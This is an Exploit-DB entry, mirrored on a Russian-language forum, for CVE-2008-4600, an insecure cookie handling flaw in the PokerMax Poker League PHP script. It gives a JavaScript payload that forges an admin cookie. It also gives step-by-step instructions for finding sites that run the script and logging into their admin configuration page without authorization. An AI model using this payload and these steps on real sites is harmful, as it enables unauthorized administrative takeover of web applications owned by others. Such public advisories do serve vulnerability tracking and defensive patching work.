- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6766
- Проверка EDB
-
- Пройдено
- Автор
- DARKLIFE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4600
- Дата публикации
- 2008-10-16
Код:
**************************************************************************************
Author : DaRkLiFe
Greetz : str0ke & S.W.A.T. & funkys0ul
**************************************************************************************
Script :
PokerMax Poker League Insecure Cookie Handling Vulnerability
Download:
http://www.stevedawson.com/downloads/pokerleague.zip
**************************************************************************************
Exploit :
javascript:document.cookie = "ValidUserAdmin=admin";
**here "admin" refers to username of administrator on site
default username is "admin" given after installation of site
but if it is changed u can easily find out username of admin and then
substitute it in place of "admin"
**************************************************************************************
Instructions :
Find the site running on this script .
Go to http://site.com/pokerleague/pokeradmin/configure.php
It will ask for login. Now in url tab run the exploit command
Then return back to http://site.com/pokerleague/pokeradmin/configure.php
Now u should be loggedin as admin and change the thing into what you want .
**************************************************************************************
THANKS ! GREETZ ! HAPPY DIWALI !
**************************************************************************************
# milw0rm.com [2008-10-16]
- Источник
- www.exploit-db.com